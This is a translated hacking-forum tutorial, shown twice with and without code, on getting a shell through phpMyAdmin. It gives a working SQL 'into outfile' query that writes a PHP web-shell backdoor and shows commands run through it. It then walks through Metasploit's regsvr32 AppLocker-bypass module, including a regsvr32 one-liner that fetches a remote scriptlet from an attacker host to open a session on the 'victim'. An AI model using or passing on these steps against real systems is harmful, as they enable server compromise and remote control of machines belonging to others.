- 21 Eki 2015
- 477
- 1
Hello, dear Turk Hack Team family. Today, I will tell you about phpMyAdmin Shell Upload topic.
Lets examine the headlines that matter.
phpMyAdmin
phpMyAdmin is a tool written in php on the basis. PhpMyAdmin is the administration unit of MySQL. With phpMyAdmin, we can do many large operations, easily remove errors that occur in our system.
We can easily control databases, columns, users and directories and perform extensive operations on them. Also, phpMyAdmin is one of the most popular applications developed with php. We can send SQL queries through this application and view these queries.
Shell
Shell is basically a material that gives you high-level authority on a discarded site. The shell commonly used in Pentest stages can give you various powers such as deleting, writing, reading. Thanks to Shell, access to the authorizations of the site owner is possible. In short, if shell is used, it gives you Permission. If you dont have full access to Shell, then we need to do various operations such as trying to be root.
Ways to do Shell
Remote File Inclusion Vulnerability
SQL Injection Vulnerability
Exploits
Upload Vulnerability
Social Engineering
We can do Shell Upload with various types of exploits and methods such as Vulnerability.
Titles in the Subject
What is phpMyAdmin?
What is Shell?
Ways to do Shell
Installing phpMyAdmin Shell Upload and How to do?
Installing phpMyAdmin Shell Upload and How To Do?
First, lets look at the site where we will install the Xampp application.
Then we open our terminal and start the installation of Xampp.
Now we are checking the directories to make sure they are loaded.
We make the adjustments of the file.
Then we run the setup file.
Then we start setup. We press the next button.
In the next screen we make sure that both options are selected and say next.
We say next" on the screen.
We say next on the screen that comes up again.
We say next again.
We wait for it to be installed and say next after it is installed.
After making sure that the box is selected, we click on the finish button.
Then we see this page. Here we click on the phpMyAdmin section.
Then we click the new button from here.
Here we click on the section that says SQL from the top.
We write the code in the code in the box in the SQL Section. We click the Go button.
To check that Shell was successfully created http://192.168.1.101:81/backdoor,php we are going to this site(URL depends on local host.)
Then we go "http://192.168.1.101:81/backdoor.php?cmd = dir " this URL. The information of our victim appears.
Then we update our tools to make sure our tools are up to date. (It isnt compulsory to do it, update recently for those who dont make the error in order to av0id.)
We are opening our tool. Then we choose our exploit.
We are entering information on our victim. (local host varies.)
Then we run exploit now.
Then we are logging in cmd from windows or from "http://192.168.1.104:8080/cmd=regsvr32 /s /n /u i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll".
It will look like this when we get back to the terminal.
We write sysinfo to learn the information of our victims device.
Yes, this is it Turk Hack Team family. See you at the next topic. Peace.
Source: https://www.turkhackteam.org/siber-guvenlik/1867267-phpmyadmin-shell-upload-xowly.html
Lets examine the headlines that matter.
phpMyAdmin
phpMyAdmin is a tool written in php on the basis. PhpMyAdmin is the administration unit of MySQL. With phpMyAdmin, we can do many large operations, easily remove errors that occur in our system.
We can easily control databases, columns, users and directories and perform extensive operations on them. Also, phpMyAdmin is one of the most popular applications developed with php. We can send SQL queries through this application and view these queries.
Shell
Shell is basically a material that gives you high-level authority on a discarded site. The shell commonly used in Pentest stages can give you various powers such as deleting, writing, reading. Thanks to Shell, access to the authorizations of the site owner is possible. In short, if shell is used, it gives you Permission. If you dont have full access to Shell, then we need to do various operations such as trying to be root.
Ways to do Shell
Remote File Inclusion Vulnerability
SQL Injection Vulnerability
Exploits
Upload Vulnerability
Social Engineering
We can do Shell Upload with various types of exploits and methods such as Vulnerability.
Titles in the Subject
What is phpMyAdmin?
What is Shell?
Ways to do Shell
Installing phpMyAdmin Shell Upload and How to do?
Installing phpMyAdmin Shell Upload and How To Do?
First, lets look at the site where we will install the Xampp application.
Then we open our terminal and start the installation of Xampp.
Kod:
wget http://downloads.sourceforge.net/project/xampp/XAMPP%20Linux/1.8.3/xampp-linux-x64-1.8.3-3-installer.run
Now we are checking the directories to make sure they are loaded.
Kod:
ls
We make the adjustments of the file.
Kod:
sudo chmod +x xampp-linux-x64-1.8.3-3-installer.run
Then we run the setup file.
Kod:
sudo ./xampp-linux-x64-1.8.3-3-installer.run
Then we start setup. We press the next button.
In the next screen we make sure that both options are selected and say next.
We say next" on the screen.
We say next on the screen that comes up again.
We say next again.
We wait for it to be installed and say next after it is installed.
After making sure that the box is selected, we click on the finish button.
Then we see this page. Here we click on the phpMyAdmin section.
Then we click the new button from here.
Here we click on the section that says SQL from the top.
We write the code in the code in the box in the SQL Section. We click the Go button.
Kod:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
To check that Shell was successfully created http://192.168.1.101:81/backdoor,php we are going to this site(URL depends on local host.)
Then we go "http://192.168.1.101:81/backdoor.php?cmd = dir " this URL. The information of our victim appears.
Then we update our tools to make sure our tools are up to date. (It isnt compulsory to do it, update recently for those who dont make the error in order to av0id.)
We are opening our tool. Then we choose our exploit.
Kod:
msfconsole
Kod:
use exploit/windows/misc/regsvr32_applocker_bypass_server
We are entering information on our victim. (local host varies.)
Kod:
set lhost 192.168.1.33
Kod:
set lport 4444
Then we run exploit now.
Kod:
exploit
Then we are logging in cmd from windows or from "http://192.168.1.104:8080/cmd=regsvr32 /s /n /u i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll".
Kod:
regsvr32 /s /n /u / i:http://192.168.1.104:8080/sVW72p3IRZBScv.sct%20scrobj.dll
It will look like this when we get back to the terminal.
We write sysinfo to learn the information of our victims device.
Kod:
sysinfo
Yes, this is it Turk Hack Team family. See you at the next topic. Peace.
Source: https://www.turkhackteam.org/siber-guvenlik/1867267-phpmyadmin-shell-upload-xowly.html
Translator: Provido
Son düzenleme: